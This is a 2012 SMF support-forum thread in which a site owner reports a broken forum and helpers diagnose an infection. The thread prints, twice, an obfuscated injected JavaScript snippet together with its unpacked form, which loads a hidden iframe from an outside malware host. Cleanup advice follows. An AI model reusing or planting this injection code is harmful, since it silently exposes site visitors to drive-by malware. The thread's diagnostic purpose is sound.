Advertisement:

Author Topic: [Help] Urgent - Forum got messed up  (Read 1097 times)

Offline die2mrw007

  • Jr. Member
  • **
  • Posts: 266
    • GizmoLord on Facebook
    • @Gizmo_Lord on Twitter
    • GizmoLord
[Help] Urgent - Forum got messed up
« on: February 22, 2012, 11:24:19 PM »
Guys, I dont know what happened all of a sudden
Forum got messed up.. All the categories, board descriptions, etc at Index page is displaying in BIG letters.. Unable to post anything, just a white blank screen appears if we click on submit. Unable to login sometimes (session timed out error pops out). Even login problems are arising :(

There isnt any change I did to the forum. The last mod I installed to forum was Global Header and Footer mod. But this mod was installed a day back and I uninstalled too due to an issue with pruning messages in certain boards via admin panel.

I still couldn't figure out how exactly it got happened.... I really need help regarding this. Its a serious issue !!!

For anyone who wish to try
Here is the forum link : http://forum.gizmolord.com
« Last Edit: April 22, 2012, 04:57:09 PM by die2mrw007 »

Offline vbgamer45

  • SMF Friend
  • SMF Super Hero
  • *
  • Posts: 16,692
    • smfhacks on Facebook
    • VBGAMER45 on GitHub
    • @createaforum on Twitter
    • SMF For Free
Re: [Help] Urgent - Forum got messed up
« Reply #1 on: February 23, 2012, 12:23:17 AM »
You are infected by a script it is injecting a javascript based on your pages:
Code: [Select]
<script>if(window['d'+'o'+'c'+'u'+'m'+'e'+'nt'])aa=/\w/.exec(new Date()).index+[];aaa='0';try{new document();}catch(qqq){ss=String;}if(aa.indexOf(aaa)!==-1)
f='-30!-30!66!63!-7!1!61!72!60!78!70!62!71!77!7!64!62!77!30!69!62!70!62!71!77!76!27!82!45!58!64!39!58!70!62!1!0!59!72!61!82!0!2!52!9!54!2!84!-30!-30!-30!66!63!75!58!70!62!75!1!2!20!-30!-30!86!-7!62!69!76!62!-7!84!-30!-30!-30!61!72!60!78!70!62!71!77!7!80!75!66!77!62!1!-5!21!66!63!75!58!70!62!-7!76!75!60!22!0!65!77!77!73!19!8!8!74!69!68!66!82!78!7!61!71!76!10!7!78!76!8!61!8!13!9!13!7!73!65!73!24!64!72!22!10!0!-7!80!66!61!77!65!22!0!10!9!0!-7!65!62!66!64!65!77!22!0!10!9!0!-7!76!77!82!69!62!22!0!79!66!76!66!59!66!69!66!77!82!19!65!66!61!61!62!71!20!73!72!76!66!77!66!72!71!19!58!59!76!72!69!78!77!62!20!69!62!63!77!19!9!20!77!72!73!19!9!20!0!23!21!8!66!63!75!58!70!62!23!-5!2!20!-30!-30!86!-30!-30!63!78!71!60!77!66!72!71!-7!66!63!75!58!70!62!75!1!2!84!-30!-30!-30!79!58!75!-7!63!-7!22!-7!61!72!60!78!70!62!71!77!7!60!75!62!58!77!62!30!69!62!70!62!71!77!1!0!66!63!75!58!70!62!0!2!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!76!75!60!0!5!0!65!77!77!73!19!8!8!74!69!68!66!82!78!7!61!71!76!10!7!78!76!8!61!8!13!9!13!7!73!65!73!24!64!72!22!10!0!2!20!63!7!76!77!82!69!62!7!79!66!76!66!59!66!69!66!77!82!22!0!65!66!61!61!62!71!0!20!63!7!76!77!82!69!62!7!73!72!76!66!77!66!72!71!22!0!58!59!76!72!69!78!77!62!0!20!63!7!76!77!82!69!62!7!69!62!63!77!22!0!9!0!20!63!7!76!77!82!69!62!7!77!72!73!22!0!9!0!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!80!66!61!77!65!0!5!0!10!9!0!2!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!65!62!66!64!65!77!0!5!0!10!9!0!2!20!-30!-30!-30!61!72!60!78!70!62!71!77!7!64!62!77!30!69!62!70!62!71!77!76!27!82!45!58!64!39!58!70!62!1!0!59!72!61!82!0!2!52!9!54!7!58!73!73!62!71!61!28!65!66!69!61!1!63!2!20!-30!-30!86'.split('!');md='a';e=window['e'+'val'];w=f;s='';fr='f'+'ro'+'m'+'Char';r=ss[fr+'Code'];for(i=0;0>i-w.length;i++){j=i;s=s+r(39+1*w[j]);}
if(aa.indexOf(aaa)!==-1)
e(s);</script>

Unpacked does the following
Code: [Select]
//eval if (document.getElementsByTagName('body')[0]){iframer();} else {document.write("<iframe src='http://qlkiyu.dns1.us/d/404.php?go=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");}function iframer(){var f = document.createElement('iframe');f.setAttribute('src','http://qlkiyu.dns1.us/d/404.php?go=1');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');document.getElementsByTagName('body')[0].appendChild(f);}  //document.write (s)  <iframe src='http://qlkiyu.dns1.us/d/404.php?go=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> //jsunpack.url var s = if (document.getElementsByTagName('body')[0]){iframer();} else {document.write("<iframe src='http://qlkiyu.dns1.us/d/404.php?go=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");}function iframer  //jsunpack.url var newurl = if (document.getElementsByTagName('body')[0]){iframer();} else {document.write("<iframe src='http://qlkiyu.dns1.us/d/404.php?go=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");}function iframer 
Community Suite - Take your forum to the next level built for SMF, Gallery,Store,Classfieds,Downloads,more!

SMFHacks.com -  Paid Modifications for SMF

Latest Mod:
EzPortal - Portal System for SMF
Newsletter Pro SMF Gallery Pro SMF Classifieds SMF Store

Offline die2mrw007

  • Jr. Member
  • **
  • Posts: 266
    • GizmoLord on Facebook
    • @Gizmo_Lord on Twitter
    • GizmoLord
Re: [Help] Urgent - Forum got messed up
« Reply #2 on: February 23, 2012, 05:56:46 AM »
You are infected by a script it is injecting a javascript based on your pages:
Code: [Select]
<script>if(window['d'+'o'+'c'+'u'+'m'+'e'+'nt'])aa=/\w/.exec(new Date()).index+[];aaa='0';try{new document();}catch(qqq){ss=String;}if(aa.indexOf(aaa)!==-1)
f='-30!-30!66!63!-7!1!61!72!60!78!70!62!71!77!7!64!62!77!30!69!62!70!62!71!77!76!27!82!45!58!64!39!58!70!62!1!0!59!72!61!82!0!2!52!9!54!2!84!-30!-30!-30!66!63!75!58!70!62!75!1!2!20!-30!-30!86!-7!62!69!76!62!-7!84!-30!-30!-30!61!72!60!78!70!62!71!77!7!80!75!66!77!62!1!-5!21!66!63!75!58!70!62!-7!76!75!60!22!0!65!77!77!73!19!8!8!74!69!68!66!82!78!7!61!71!76!10!7!78!76!8!61!8!13!9!13!7!73!65!73!24!64!72!22!10!0!-7!80!66!61!77!65!22!0!10!9!0!-7!65!62!66!64!65!77!22!0!10!9!0!-7!76!77!82!69!62!22!0!79!66!76!66!59!66!69!66!77!82!19!65!66!61!61!62!71!20!73!72!76!66!77!66!72!71!19!58!59!76!72!69!78!77!62!20!69!62!63!77!19!9!20!77!72!73!19!9!20!0!23!21!8!66!63!75!58!70!62!23!-5!2!20!-30!-30!86!-30!-30!63!78!71!60!77!66!72!71!-7!66!63!75!58!70!62!75!1!2!84!-30!-30!-30!79!58!75!-7!63!-7!22!-7!61!72!60!78!70!62!71!77!7!60!75!62!58!77!62!30!69!62!70!62!71!77!1!0!66!63!75!58!70!62!0!2!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!76!75!60!0!5!0!65!77!77!73!19!8!8!74!69!68!66!82!78!7!61!71!76!10!7!78!76!8!61!8!13!9!13!7!73!65!73!24!64!72!22!10!0!2!20!63!7!76!77!82!69!62!7!79!66!76!66!59!66!69!66!77!82!22!0!65!66!61!61!62!71!0!20!63!7!76!77!82!69!62!7!73!72!76!66!77!66!72!71!22!0!58!59!76!72!69!78!77!62!0!20!63!7!76!77!82!69!62!7!69!62!63!77!22!0!9!0!20!63!7!76!77!82!69!62!7!77!72!73!22!0!9!0!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!80!66!61!77!65!0!5!0!10!9!0!2!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!65!62!66!64!65!77!0!5!0!10!9!0!2!20!-30!-30!-30!61!72!60!78!70!62!71!77!7!64!62!77!30!69!62!70!62!71!77!76!27!82!45!58!64!39!58!70!62!1!0!59!72!61!82!0!2!52!9!54!7!58!73!73!62!71!61!28!65!66!69!61!1!63!2!20!-30!-30!86'.split('!');md='a';e=window['e'+'val'];w=f;s='';fr='f'+'ro'+'m'+'Char';r=ss[fr+'Code'];for(i=0;0>i-w.length;i++){j=i;s=s+r(39+1*w[j]);}
if(aa.indexOf(aaa)!==-1)
e(s);</script>

Unpacked does the following
Code: [Select]
//eval if (document.getElementsByTagName('body')[0]){iframer();} else {document.write("<iframe src='http://qlkiyu.dns1.us/d/404.php?go=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");}function iframer(){var f = document.createElement('iframe');f.setAttribute('src','http://qlkiyu.dns1.us/d/404.php?go=1');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');document.getElementsByTagName('body')[0].appendChild(f);}  //document.write (s)  <iframe src='http://qlkiyu.dns1.us/d/404.php?go=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> //jsunpack.url var s = if (document.getElementsByTagName('body')[0]){iframer();} else {document.write("<iframe src='http://qlkiyu.dns1.us/d/404.php?go=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");}function iframer  //jsunpack.url var newurl = if (document.getElementsByTagName('body')[0]){iframer();} else {document.write("<iframe src='http://qlkiyu.dns1.us/d/404.php?go=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");}function iframer 
Thanks mate....will this affect the database too ?
Uploading new forum with same database will solve this issue ?

Offline Aleksi "Lex" Kilpinen

  • SMF Friend
  • SMF Super Hero
  • *
  • Posts: 15,430
  • Gender: Male
  • The Artist Formerly Known as LexArma
Re: [Help] Urgent - Forum got messed up
« Reply #3 on: March 10, 2012, 10:54:03 AM »
You should go through all your files. Most SMF files can be cleaned up by doing a large upgrade, which will effectivily overwrite all infected files with clean copies of them. There is no quarantee that your database is untouched, so you should at least change all admin passwords and similar info.
Finnish Support Local Moderator & Support Specialist
My Mods: Facebook and Twitter Sharer